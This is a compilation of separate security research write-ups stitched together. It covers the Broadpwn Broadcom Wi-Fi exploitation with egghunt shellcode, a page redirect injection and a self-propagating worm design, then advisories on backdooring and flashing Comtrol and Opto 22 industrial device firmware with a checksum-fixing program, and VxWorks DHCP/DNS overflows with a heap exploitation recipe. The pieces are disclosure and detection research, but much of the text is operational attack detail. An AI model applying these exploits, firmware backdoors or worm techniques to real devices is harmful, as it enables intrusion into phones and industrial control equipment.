The next question is how to leverage our write primitive into full code execution. For this, two approaches will be considered: one which requires us to know firmware memory addresses in advance (or to brute force those addresses by crashing the chip several times), and another method, more difficult to implement, which requires a minimum of that knowledge. We’ll look at the former approach first.
To achieve a write primitive, we need to overwrite pspoll_timer with a memory address that we control. Since the addresses of both wlc->current_wmm_ie and wlc->ps are known and consistent for a given firmware build, and since we can fully overwrite their contents, we can clobber pspoll_timer to point anywhere within these objects. For the creation of a fake wl_timer object, the unused area between wlc->current_wmm_ie and wlc->ps is an ideal fit. Placing our fake timer object there, we’ll cause field_18 to point to an address we want to overwrite (minus an offset of 14) and have field_1c hold the contents we want to overwrite that memory with. After we trigger the overwrite, we only need to wait for the timer function to be called, and do our overwrite for us.
The next stage is to determine which memory address do we want to overwrite. As can be seen in the above function, immediately after we trigger our overwrite, a call to j_restore_cpsr is made. This function basically does one thing: it refers to the function thunk table found in RAM (mentioned previously when we described HNDRTE and the BCM43xx architecture), pulls the address of restore_cpsr from the thunk table, and jumps to it. Therefore, by overwriting the index of restore_cpsr in the thunk table, we can cause our own function to be called immediately afterwards. This has the advantage of being portable, since both the starting address of the thunk table and the index of the pointer to restore_cpsr within it are consistent between firmware builds.
We have now obtained control of the instruction pointer and have a fully controlled jump to an arbitrary memory address. This is made sweeter by the fact that there are no restrictions on memory permissions – the entire RAM memory is RWX, meaning we can execute code from the heap, the stack or wherever else we choose. But we still face a problem: finding a good location to place our shellcode is an issue. We can write the shellcode to the wlc->pm struct that we are overflowing, but this poses two difficulties: first, our space is limited by the fact that we only have an overwrite of 211 bytes. Second, the wlc->pm struct is constantly in use by other parts of the HNDRTE code, so placing our shellcode at the wrong place within the structure will cause the whole system to crash.
After some trial and error, we realized that we had a tiny amount of space for our code: 12 bytes within the wlc->pm struct (the only place where overwriting data in the struct would not crash the system), and 32 bytes in an adjacent struct which held an SSID string (which we could freely overwrite). 44 bytes of code are not a particularly useful payload – we’ll need to find somewhere else to store our main payload.
The normal way to solve such a problem in exploits is to look for a spray primitive: we’ll need a way to write the contents of large chunks of memory, giving us a convenient and predictable location to store our payload.
While spray primitives can be an issue in remote exploits, since sometimes the remote code doesn’t give us a sufficient interface to write large chunks of memory, in this case it was easier than expected – in fact, we didn’t even need to go through the code to look for suitable allocation primitives. We just had to use common sense.
Any WiFi implementation will need to handle many packets at any given time. For this, HNDRTE provides the implementation of a ring buffer common to the D11 chip and the main microcontroller. Packets arriving over PHY are repeatedly written to this buffer until it gets filled, and which point new packets are simply written to the beginning of the buffer and overwrite any existing data there.
For us, this means that all we need to do is broadcast our payload over the air and over multiple channels. As the WiFi chip repeatedly scans for available APs (this is done every few seconds even when the chip is in power saving mode), the ring buffer gets filled with our payload – giving us the perfect place to jump to and enough space to store a reasonably sized payload.
What we’ll do, therefore, is this: write a small stub of shellcode within wlc->pm, which saves the stack frame (so we can restore normal execution afterwards) and jumps to the next 32 bytes of shellcode which we store in the unused SSID string. This compact shellcode is nothing else than classic egghunting shellcode, which searches the ring buffer for a magic number which indicates the beginning of our payload, then jumps to it.
So, time to look at the POC code. This is how the exploit buffer is crafted:
And this is the shellcode which carries out the egghunt:
__attribute__((naked)) voidshellcode_start(void) {
asm("push {r0-r3,lr}\n"
"bl egghunt\n"
"pop {r0-r3,pc}\n");
}
void egghunt(unsigned int cpsr) {
unsigned int egghunt_start = RING_BUFFER_START;
unsigned int *p = (unsigned int *) egghunt_start;
void (*f)(unsigned int);
loop:
p++;
if (*p != 0xc0deba5e)
goto loop;
f = (void (*)(unsigned int))(((unsigned char *) p) + 5);
f(cpsr);
return;
}
So we have a jump to our payload, but is that all we need to do? Remember that we have seriously corrupted the wlc->pm object, and the system will not remain stable for long if we leave it that way. Also recall that one of our main objectives is to avoid crashing the system – an exploit which gives an attacker transient control is of limited value.
Therefore, before any further action, our payload needs to restore the wlc->pm object to its normal condition. Since all addresses in this object are consistent for a given firmware build, we can just copy these values back into the buffer and restore the object to a healthy state.
Here’s an example for what an initial payload will look like:
At this stage, we have achieved our first and most important mission: we have reliable, consistent RCE against the BCM chip, and our control of the system is not transient – the chip does not crash following the exploit. At this point, the only way we will lose control of the chip is if the user turns off WiFi or if the chip crashes.
THE EXPLOIT – SECOND APPROACH
As we mentioned, there is still a problem with the above approach. For each firmware build, we’ll need to determine the correct memory addresses to be used in the exploit. And while those addresses are guaranteed to be consistent for a given build, we should still look for a way to avoid the hard work of compiling address tables for each firmware version.
The main problem is that we need a predictable memory address whose contents we control, so we can overwrite the pspoll_timer pointer and redirect it to our fake timer object. The previous approach relied on the fact that the address of wlc->pm is consistent for a given firmware build. But there’s another buffer whose address we already know: the ring buffer. And in this case, there’s an added advantage: its beginning address seems to be the same across the board for a specific chip type, regardless of build or version number.
For the BCM4359, the ring buffer’s beginning address is 0x221ec0. Therefore, if we ensure a packet we control will be written exactly to the beginning of the ring buffer, we can place our fake timer object there, and our payload immediately after it. Of course, making sure that our packet is put exactly at the beginning of the buffer is a serious challenge: We may be in an area with dozens of other APs and STAs, increasing the noise level and causing us to contend with many other packets.
In order to win the contest for the desired spot in the ring buffer, we have set up a dozen Alfa wireless adapters, each broadcasting on a different channel. By causing them to simultaneously bombard the air with packets on all channels, we have reached a situation where we successfully grab the first slot in the ring buffer about 70% of the time. Of course, this result could radically change if we move to a more crowded WiFi environment.
Once we grab the first slot, exploitation is simple: The fake timer object writes to the offset of p_restore_cpsr, overwriting it with the address of an offset within our packet in the first slot. This is where we will store our payload.
Despite the difficulty of this approach and the fact that it requires additional gear, it still offers a powerful alternative to the previous exploitation approach, in that the second approach does not require knowledge of addresses within the system.
THE NEXT STEP – PRIVILEGE ESCALATION
After achieving stable code execution on the Broadcom chip, an attacker’s natural goal would be to escape the chip and escalate their privileges to code execution on the application processor. There are three main approaches to this problem:
Find a bug in the Broadcom kernel driver that handles communication with the chip. The driver and chip communicate using a packet-based protocol, so an extensive attack surface on the kernel is exposed to the chip. This approach is difficult, since, unless a way to leak kernel memory is found, an attacker will not have enough knowledge about the kernel’s address space to carry out a successful exploit. Again, attacking the kernel is made more difficult by the fact that any mistake we make will crash the whole system, causing us to lose our foothold in the WiFi chip.
Using PCIe to read and write directly to kernel memory. While WiFi chips prior to the BCM4358 (the main WiFi chip used on the Samsung Galaxy S6) used Broadcom’s SDIO interface, more recent chips use PCIe, which inherently enables DMA to the application processor’s memory. The main drawback of this approach is that it will not support older phones.
Waiting for the victim to browse to a non-HTTPS site, then, from the WiFi chip, redirecting them to a malicious URL. The main advantage of this approach is that it supports all devices across the board. The drawback is that a separate exploit chain for the browser is required.
We believe that achieving kernel code execution from the chip is a sufficiently complicated subject as to justify a separate research; it is therefore out of the scope of the current research. However, work has already been done by Project Zero to show that a kernel write primitive can be achieved via PCIe [d].
In the current research, our approach is to use our foothold on the WiFi chip to redirect the user to an attacker-controlled site. This task is made simple by the fact that a single firmware function, wlc_recv(), is the starting point for processing all packets. The signature of this function is as follows:
void wlc_recv(wlc_info *wlc, void *p);
The argument p is a pointer to HNDRTE’s implementation of an sk_buff. It holds a pointer to the packet data, as well as the packet’s length and a pointer to the next packet. We will need to hook the wlc_recv function call, dump the contents of each packet that we receive. and look for packets that encapsulate unencrypted HTTP traffic. At this point, we will modify the packet the include a <script> tag, with the code: “top.location.href = http://www.evilsite.com”.
THE FIRST WIFI WORM
The nature of the bug, which can be triggered without any need for authentication, and the stability of the exploit, which deterministically and reliably reaches code execution, leads us to the return of an old friend: the self-propagating malware, also known as “worm”.
Worms died out around the end of the last decade, together with their essential companion, the remote exploit. They have died out for the same reason: software mitigations have become too mature, and automatic infection over the network became a distant memory. Until now.
Broadpwn is ideal for propagation over WLAN: It does not require authentication, doesn’t need an infoleak from the target device, and doesn’t require complicated logic to carry out. Using the information provided above, an attacker can turn a compromised device into a mobile infection station.
We implemented our WiFi worm with the following steps:
In the previous section, we have started running our own payload after restoring the system to a stable state and preventing a chip crash. The payload will hook wlc_recv, in a similar manner to the one showed above.
The code in wlc_recv_hook will inspect each received packet, and determine whether it is a Probe Request. Recall that wlc_recv essentially behaves as if it runs in monitor mode: all packets received over the air are handled by it, and only tossed out later if they are not meant for the STA.
If the received packet is a Probe Request with the SSID of a specific AP, wlc_recv_hook will extract the SSID of the requested AP, and start impersonating as that AP by sending out a Probe Response to the STA.
In the next stage, wlc_recv should receive an Authentication Open Sequence packet, and our hook function should send a response. This will be followed by an Association Request from the STA.
The next packet we will send is the Association Response containing the WMM IE which triggers for the bug. Here, we’ll make use of the fact that we can crash the targeted chip several times without alerting the user, and start sending crafted packets adapted to exploit a specific firmware build. This will be repeated until we have brute forced the correct set of addresses. Alternatively, the second approach, which relies on spraying the ring buffer and placing the fake timer object and the payload at a deterministic location, can also be used.
Running an Alfa wireless adapter on monitor mode for about an hour in a crowded urban area, we’ve sniffed hundreds of SSID names in Probe Request packets. Of these, approximately 70% were using a Broadcom WiFi chip [e]. Even assuming moderate infection rates, the impact of a Broadpwn worm running for several days is potentially huge.
Old school hackers often miss the “good old days” of the early 2000s, when remotely exploitable bugs were abundant, no mitigations were in place to stop them, and worms and malware ran rampant. But with new research opening previously unknown attack surface such as the BCM WiFi chip, those times may just be making a comeback.
References
[a] While KASLR is still largely unsupported on Android devices, the large variety of kernels out there effectively means that an attacker can make very few assumptions about an Android kernel’s address space. Another problem is that any misstep during an exploit will cause a kernel panic, crashing the device and drawing the attention of the victim.
[b] The BCM43xx family has been the subject of extensive security research in the past. Notable research includes Wardriving from Your Pocket (https://recon.cx/2013/slides/Recon2013-Omri%20Ildis%2C%20Yuval%20Ofir%20and%20Ruby%20Feinstein-Wardriving%20from%20your%20pocket.pdf) by Omri Ildis, Yuval Ofir and Ruby Feinstein; One Firmware to Monitor ’em All (http://archive.hack.lu/2012/Hacklu-2012-one-firmware-Andres-Blanco-Matias-Eissler.pdf) by Andres Blanco and Matias Eissler; and the Nexmon project by SEEMOO Lab (https://github.com/seemoo-lab/nexmon). These projects aimed mostly to implement monitor mode on Nexus phones by modifying the BCM firmware, and their insights greatly assisted the author with the current research. More recently, Gal Beniamini of Project Zero has published the first security-focused report about the BCM43xx family (https://googleprojectzero.blogspot.ca/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html), and has discovered several bugs in the BCM firmware.
This function does not exist in the source code that we managed to obtain, so the naming is arbitrary.
[d] Gal Beniamini’s second blog post about BCM deals extensively with this issue (https://googleprojectzero.blogspot.co.il/2017/04/over-air-exploiting-broadcoms-wi-fi_11.html). And while a kernel read primitive is not demonstrated in that post, the nature of the MSGBUF protocol seems to make it possible.
[e] This is an estimate, and was determined by looking up the OUI part of the sniffed device’s MAC address.
Grammar-based fuzzing is not new, nor is my grammar-based fuzzer; however, this is my fifth, best, and favorite rewrite of it. My grammar fuzzer started with the original version in ruby, and then over the years was rewritten once more in ruby and twice in Python. This version is the third Python rewrite.
Contributors: David Barksdale of Exodus Intelligence, Independent Security Researcher Jeremy Brown
These are two vulnerabilities that allow a remote unauthenticated attacker to update firmware. If the device is configured with MAC or IP filtering, the attacker can bypass filtering if they have access to the same network segment as the device.
Comtrol RocketLinx ES8510-XTE
Product Overview
The Comtrol RocketLinx ES8510-XTE is a managed industrial Ethernet switch. It has seven 10/100BASE-TX ports and three additional ports which can be allocated among any of three 10/100BASE-TX ports and three SFP ports. It has two digital-in and two digital-out ports which can be used for alarms or triggering events. It also has an RS-232 console port.
The switch can be managed with a Command Line Interface (CLI) accessible over the console port, SSH, and Telnet; with a web interface; SNMP; and with a Windows program called PortVision DX.
Vulnerability
The CLI, web interface, and SNMP all require authentication, however the PortVision program can carry out certain management tasks without authentication. PortVision sends commands to the switch via UDP packets to port 5010. The switch can be configured to filter packets based on an IP and MAC whitelist to prevent attackers from sending unauthorized commands to the switch. This can be bypassed and an attacker can use the PortVision protocol to upload and flash a backdoored firmware to the switch.
Because the PortVision protocol lacks authentication and can upload and flash firmware files, which also lack cryptographic authentication, an attacker can install a backdoor in the switch. The PortVision protocol is also session-less UDP, allowing an attacker to bypass IP and MAC filtering by sending spoofed packets to the switch.
Comtrol has published firmware version 2.7d which allows users to disable the PortVision service, in earlier versions the service is always available.
PortVision Protocol
PortVision sends requests to network devices using UDP on port 5010, either to the IP broadcast address or unicast to a specific IP. Responses are always sent to the IP broadcast address and the UDP source and destination ports swapped from the request. Both requests and responses have the same format. The data format is a sequence of records having three parts: a 32-bit big-endian type code, a 32-bit big-endian length, and a variable-sized value with the specified length. The type code of the first record in a request is the type of the request and the value of this record is unused. The following records are parameters to the request. The responses usually have a record with an acknowledge type code to match the request, but it is not always the first record in the response. The known type codes are listed below.
PortVision Protocol Record Types
Type Code
Description
1
Manufacturer string
2
Model string
3
MAC address (6 bytes)
4
IP address (4 bytes)
5
IP netmask (4 bytes)
6
IP gateway (4 bytes)
7
Discovery request
8
Discovery acknowledgement
11
IP configuration request
12
IP configuration acknowledgement
21
Configuration file backup request
24
Configuration file restore request
27
Configuration file load default request
25
Reset to factory defaults acknowledgement
31
Firmware upgrade request
32
Firmware upgrade acknowledgement
33
Firmware upgrade error string
34
Version string
35
Bootloader upgrade request
43
TFTP clear file request (clears /home/Quaaga.conf and /home/firmware.bin)
44
Reboot request
45
Reset to factory defaults request
91
LED signal on request
92
LED signal off request
94
SFP check request
111
Self-test request
The IP configuration, factory reset, and reboot requests require a MAC address record matching the network device intended to carry out the request.
Disabling Security
The switch can be configured with IP and MAC whitelists. The attacker can discover a whitelisted IP address by sending a PortVision discovery request to the IP broadcast address from every IP address in a subnet looking for responses. The response from the switch is also sent to the IP broadcast address. In order to determine which IP address was in the whitelist, each discover request is sent from a unique UDP source port, the discovery reply is sent back to the same port. The MAC filtering is bypassed by sending packets from the Ethernet broadcast address (FF:FF:FF:FF:FF), which is always allowed through the filter. This can only be done if the attacker is on the same network segment as the switch.
The discovery request has one record of type 7, length 1, and data 1:
If only IP filtering is configured and the attacker already knows the MAC and IP of the switch and an IP address on the whitelist and the attacker can send it packets with a spoofed IP source address, then the firmware update can be carried out from outside the local network segment and without the need for a factory reset.
Backdooring the Firmware
A backdoored firmware image is created by extracting the parts of the 2.7c firmware image—the kernel, the squashfs filesystem, and the trailer—and then modifying the /etc/passwd file to allow the root user to login over SSH, and then recombining the parts and updating the checksum in the trailer.
Firmware Parts
Offset
Size
Description
0
0x100000
Kernel
0x100000
0x459000
SquashFS Root
0x559000
0x1000
Trailer
The squashfs filesystem can be extracted and re-made using the squashfs-2.2-r2-7z code from Firmware Mod Kit. The only modification made is to give root the password “exodus” and the shell /bin/sh.
The new squashfs filesystem is combined with the original kernel and tailer parts and the checksum in the trailer is updated with the following C program.
#include <endian.h>
#include <stdint.h>
#include <stdio.h>
int main(int argc, char **argv)
{
FILE *fp = fopen(argv[1], "r+");
if (!fp) {
perror("fopen");
return -1;
}
// sum every little-endian 32-bit word in the file
uint32_t checksum = 0;
uint32_t buf[1024];
int i;
while (1024 == fread(buf, 4, 1024, fp)) {
for (i = 0; i < 1024; i++)
checksum += le32toh(buf[i]);
}
// subtract out the last block
for (i = 0; i < 1024; i++)
checksum -= le32toh(buf[i]);
printf("checksum = 0x%08X\n", checksum);
// print out the obfuscated product-version string
printf("Firmware Version: ");
uint8_t *bytes = (uint8_t *)buf;
for (i = 791; i < 791 + 34; ++i) {
bytes[i] -= 103;
printf("%c", bytes[i]);
}
printf("\n");
// checksum is stored in little endian at offset 283
fseek(fp, -4096 + 283, SEEK_CUR);
checksum = htole32(checksum);
printf("writing checksum at offset %ld\n", ftell(fp));
fwrite(&checksum, 4, 1, fp);
fclose(fp);
}
Flashing the Firmware
The backdoored firmware is transferred using TFTP to the destination path
/home/firmware.bin
on the switch. Then a PortView request is sent to command the switch to flash the firmware:
Exploitation attempts can be detected by monitoring network traffic for unexpected TFTP and PortVision traffic. The PortVision software periodically polls the network with discovery requests, but firmware upgrade requests should be rare and only during planned maintenance.
Opto 22 OPTEMU-SNR-DR2
Product Overview
The Opto 22 OPTEMU-SNR-DR2 is an energy monitoring and control device. It can monitor two KY or KYZ pulsing devices and up to 64 data inputs from Modbus devices over serial or Ethernet. It has four relay outputs for controlling equipment or signaling other energy or building management systems.
The device can be managed over Ethernet using the OptoMMP, PAC Control, FTP, and SNMP protocols.
The latest firmware as of this publication (version 9.2b) is vulnerable.
Vulnerability
The FTP and SNMP protocols both support authentication, however the OptoMMP and PAC Control protocols do not support authentication. The OptoMMP protocol can be used for administrative tasks like modifying IP filtering rules and the credentials used for FTP authentication. The PAC Control protocol is not used in this exploit but also provides a high level of access to the device’s functions.
The device does not use cryptographic authentication to verify new firmware images and will accept a malicious firmware uploaded over FTP. The FTP authentication credentials can be read directly from the device using the OptoMMP protocol, which itself has no authentication. The OptoMMP protocol has a session-less UDP mode, allowing an attacker to bypass IP filtering by sending spoofed packets to the device.
OptoMMP Protocol
The OptoMMP protocol is documented in OptoMMP Protocol Guide. The protocol is based on IEEE 1394 and presents a memory-map which can be read and written by byte addresses. It can be accessed via TCP or UDP on port 2001. The memory addresses relevant to this exploit are listed below.
OptoMMP Security Fields
Address
Size
Description
0xfffff03a0010
0x4
FTP port
0xfffff03d0000
0x40
FTP username
0xfffff03d0040
0x40
FTP password
0xfffff03a0020
0x4
IP Filter Address
0xfffff03a0024
0x4
IP Filter Mask
⋮
(eight address-mask pairs omitted)
0xfffff03a0068
0x4
IP Filter Address
0xfffff03a006c
0x4
IP Filter Mask
0xfffff0300080
0x20
Device’s part number
Disabling Security
The device can be configured with IP filtering whitelists and the FTP service can be disabled by setting its port number to zero. A whitelisted IP address can be discovered by sending an OptoMMP read request to the broadcast address from every IP address in a subnet looking for responses. This can only be done if the attacker is on the same network segment as the device.
The following packet hexdump shows the contents of the UDP packets used to discover a whitelisted IP address. The packets are sent to the IP broadcast address 255.255.255.255. The IP source address is different for each packet as it is scanned through a range of addresses. At the UDP layer the packets are sent to port 2001 and the source port is randomly chosen. The transaction label (the six high-order bits in the third byte) is also chosen randomly.
At this point the firmware can be upgraded using the FTP server on port 21.
Firmware
The firmware image is a raw image that is stored in flash memory which is mapped into the CPUs address space at
0x60000000
. The firmware has an ANSI CRC16 checksum stored as a big-endian 32-bit number at offset
0x3f8
into the file and the file size is stored as a big-endian 32-bit number at offset
0x3fc
into the file.
Flashing the Firmware
The firmware is uploaded over FTP to the device into the root directory. The command to program the firmware into flash memory is the string “Krn <filename>” uploaded as a file named “commandfile” over FTP. The result of the command can be read back by downloading the “commandfileresponse” file. The following is a transcript from the FTP control connection.
220 Opto 22 FTP server ready.
<span style="color: #ff0000;"><strong>USER admin</strong></span>
331 Please specify the password.
<span style="color: #ff0000;"><strong>PASS exodus</strong></span>
230 User logged in, proceed.
<span style="color: #ff0000;"><strong>TYPE i</strong></span>
200 TYPE Command okay.
<span style="color: #ff0000;"><strong>PASV</strong></span>
227 Entering Passive Mode (10,100,0,3,250,245).
<span style="color: #ff0000;"><strong>STOR payload</strong></span>
150 File status okay; about to open data connection.
226 Closing data connection.
<span style="color: #ff0000;"><strong>TYPE i</strong></span>
200 TYPE Command okay.
<span style="color: #ff0000;"><strong>PASV</strong></span>
227 Entering Passive Mode (10,100,0,3,205,91).
<span style="color: #ff0000;"><strong>STOR commandfile</strong></span>
150 File status okay; about to open data connection.
226 Closing data connection.
<span style="color: #ff0000;"><strong>TYPE i</strong></span>
200 TYPE Command okay.
<span style="color: #ff0000;"><strong>PASV</strong></span>
227 Entering Passive Mode (10,100,0,3,159,210).
<span style="color: #ff0000;"><strong>RETR commandfileresponse</strong></span>
150 File status okay; about to open data connection.
226 Closing data connection.
221 Goodbye.
The device automatically reboots after successful programming.
This procedure leaves the networking configuration intact but clears other configuration and programming of the device.
Detection Guidance
Exploitation attempts can be detected by monitoring network traffic for unexpected FTP and OptoMMP traffic. Firmware upgrades should be rare and only during planned maintenance.
Earlier this year we reported 3 vulnerabilities in VxWorks to Wind River. Each of these vulnerabilities can be exploited by anonymous remote attackers on the same network without user interaction to take control of the affected device. VxWorks is widely used in Aerospace and Defense, Automotive, Industrial, Medical, Consumer Electronics, Networking and Communication Infrastructure applications (https://en.wikipedia.org/wiki/VxWorks#Notable_uses).
2. Summary
As of this writing the flaws have not been assigned CVE numbers, they are:
DHCP client heap overflow in handle_ip() affecting VxWorks 6.4 and prior
DHCP server stack overflow in ipdhcps_negotiate_lease_time() affecting VxWorks 6.9 versions prior to 6.9.3.1, VxWorks 6.8, VxWorks 6.7, VxWorks 6.6, and VxWorks 6.5 and prior versions
DNS client stack overflow in ipdnsc_decode_name() affecting VxWorks 7, VxWorks 6.9, VxWorks 6.8, VxWorks 6.7, VxWorks 6.6, and VxWorks 6.5
Please login to your support account on windriver.com or contact your Wind River support representative for mitigation of these issues.
3. Vulnerabilities
A. DHCP IP Address Option Client Heap Overflow
VxWorks 6.4 and prior fail to properly handle the lengths of IP addresses in DHCP Options in handle_ip() and handle_ips(). handle_ip() contains a trivial overflow and will be the focus of this section. The flaw was initially found while auditing the network stack of IN_DISCLOSURE. Below is the disassembly describing the flaw in handle_ip() from the IN_DISCLOSURE firmware.
As described in the disassembly above, the vulnerability is caused by using a DHCP option length from the packet to copy into a 4 byte heap buffer, resulting in a heap overflow. This vulnerability can be exploited by responding to an affected device’s DHCP request with a malicious response containing a DHCP option length larger than 4 for the following DHCP option codes: 1, 16, 28, 32, and 54.
B. DHCP Option Lease Time Negotiation Server Stack Overflow
VxWorks 6.5 through VxWorks 6.9.3 fail to properly validate a lease time length when a DHCP server parses DHCP option 51 in ipdhcps_negotiate_lease_time(), which results in a stack overflow. The flaw is caused by using a DHCP IP Address Time option length from the packet to copy into a 4 byte stack buffer, resulting in a stack overflow. In either a DHCP Discovery or Request packet, the attacker simply includes an option of type 51 (the lease time option) that is larger than the expected 4 bytes. The entire contents of the option record (up to 255 bytes) will be copied into a buffer on the stack that is only 4 bytes.
C. DNS Response Decompression Stack Overflow
VxWorks 6.5 through VxWorks 7 fail to properly bound the decompression of names in ipdnsc_decode_name() which results in a stack overflow. The following is a snippet of the affected code for your review.
IP_STATIC Ip_s32
ipdnsc_decode_name(Ip_u8 *name, Ip_u8 *buf, Ip_u8 *start, Ip_u8 *end)
{
Ip_u8 *ptr, *prev;
Ip_s32 i, len, tot_len = 0, compress = 0;
ptr = buf;
while (*ptr && ptr < end)
{
/* Loop until we find a non-pointer */
while ((*ptr & 0xc0) == 0xc0 && ptr < end)
{
prev = ptr;
ptr = start + (IP_GET_NTOHS(ptr) & 0x3fff);
if (ptr >= prev)
return -1; /* Do not allow forward jumps (avoid loops) */
if (!compress)
tot_len += 2;
compress = 1;
}
/* Store the length of the label */
if (ptr >= end)
return -1;
len = *ptr++;
if (len > IPDNSC_MAXLABEL)
return -1;
if (!compress)
tot_len = tot_len + len + 1;
if (tot_len > IPDNSC_MAXNAME)
return -1;
/* Copy the label to name */
for (i=0; i<len; i++)
{
if (ptr >= end)
return -1;
*name++ = *ptr++;
}
*name++ = '.';
}
if (!compress)/* Increment for the last zero */
tot_len++;
/* Null terminate the name string */
if (tot_len)
name--;
*name = 0;
return tot_len;
}
In the above code, the programmer fails to properly bound the decoded name to IPDNSC_MAXNAME when decompression is involved. The only caller to this function, ipdnsc_parse_response(), passes the address of a 255-byte stack buffer as the output buffer name. When an attacker causes the target to process a DNS response with a name record that decompresses to larger than 255 bytes, the stack buffer will be overflowed.
4. Exploitation
Attack Vectors
All 3 vulnerabilities may be exploited by anonymous remote attackers on the same network as the target. Since the DHCP vulnerabilities are reachable over UDP and we found no TTL enforcement, in theory, an anonymous remote attacker may be able to exploit them while not on the same network by spoofing packets. Non-local network exploitation seems more plausible against the DHCP Option IP Lease Time Server Stack Overflow than the DHCP Option IP Client Heap Overflow – mainly because you need to guess the client’s 2 byte Transaction ID to trigger the client overflow (spoof, spray, and pray). The DNS Decompression Stack Overflow may be exploited by attackers that are on the same network, in control of a name server, or MITM between the target and a legit name server.
The remainder of this post discusses exploitation of the DHCP IP Option Client Heap Overflow. The stack overflows are left as an exercise for the reader.
Exploiting the Heap Overflow in handle_ip()
The DHCP client heap overflow occurs when parsing option records in the DHCP Offer packet normally sent to clients from a DHCP server during start-up and periodically afterwards. DHCP option records which correspond to IP address values (type 1, 16, 28, 32, and 54) are assumed to have a length of four bytes and the function which processes these options (named handle_ip) allocates a 4-byte buffer on the heap. However when copying the contents of the option record into the buffer, the function uses the length value in the option record for the number of bytes to copy. An attacker can provide up to 255 bytes to copy into the 4-byte heap buffer.
While we weren’t able to test all affected versions on all platforms, we were able to develop an exploit for two IP Deskphones from two different vendors both running VxWorks 5.5 on MIPS32.
In broad strokes our exploit needs to corrupt heap metadata in such a way that gives us control of execution, then it needs to flush our exploit code from the data cache to main memory (MIPS has separate data and instruction caches) so it can be executed, then it needs to jump to that code. The exploit code then needs to repair the heap and for convenience start an OS task that executes whatever payload we may have.
The heap allocator maintains a doubly-linked list of free chunks which it scans when allocating memory. The previous and next pointers are stored in the chunk header along with the size of the chunk, a flag indicating if the chunk is free or allocated, and a pointer to the previous chunk in memory.
Previous Chunk
Free Chunk
Next Chunk
Previous chunk pointer
Chunk size and free flag
Next free chunk pointer
Previous free chunk pointer
Data
Our exploit overwrites the previous and next pointers of a free chunk and then allocates that chunk. During allocation the free chunk is removed from the doubly-linked list, giving us the ability to write an arbitrary 4-byte value to an arbitrary location in memory. In order to get control of execution we overwrite the function pointer in the table of DHCP option handling functions for option type 48, then cause that function to be called by adding an option of that type to our DHCP Offer packet.
To accomplish this we need to arrange the heap so that our buffer is adjacent to a free heap chunk of a known size, overflow that chunk’s header, and then allocate that chunk. This turns out to be easier than it sounds. The following DHCP option list does the job in most cases:
Option codes 3-11 cause two small allocations from the heap each, this helps defragment the heap and makes it more likely that the next chunk on the free list is large enough for our next two allocations. Assuming the next free chunk is large enough, the heap allocator will split it into two smaller chunks and return the one at the end for our first option 1. When handle_ip() processes the second option 1 record, it will allocate the heap buffer (which will be before and adjacent to the one we just allocated), notice that a buffer for option 1 was already allocated and free it (adding it to the head of the free list), then write our 32 bytes of data into the buffer which overflows into the metadata of the first free chunk on the free list. Option 28 then allocates that corrupt chunk and in doing so overwrites the function pointer for handling option 48. Option 48 then calls that pointer and we have control of execution.
We will post more details about exploitation of this issue in the near future, after IN_DISCLOSURE have had a chance to publish a fix. If you have a VxWorks-based device and would like us to develop a PoC for it, please contact info@exodusintel.com with the details.
5. Detection
A. DHCP Option IP Address Client Heap Overflow
Detection of attempts to exploit this vulnerability can be accomplished by examining the length field of DHCP Option Codes 1, 16, 28, 32, and 54 for values greater than 4 in DHCP Offers.
B. DHCP Option Lease Time Server Stack Overflow
Detection of attempts to exploit this vulnerability can be accomplished by examining the length field of DHCP Option Code 51 for values greater than 4 in DHCP Discover and Request packets.
C. DNS Response Decompression Stack Overflow
Detection of attempts to exploit this vulnerability can be accomplished by examining names in DNS responses for compression that results in a decoding of a name to larger than 255 bytes.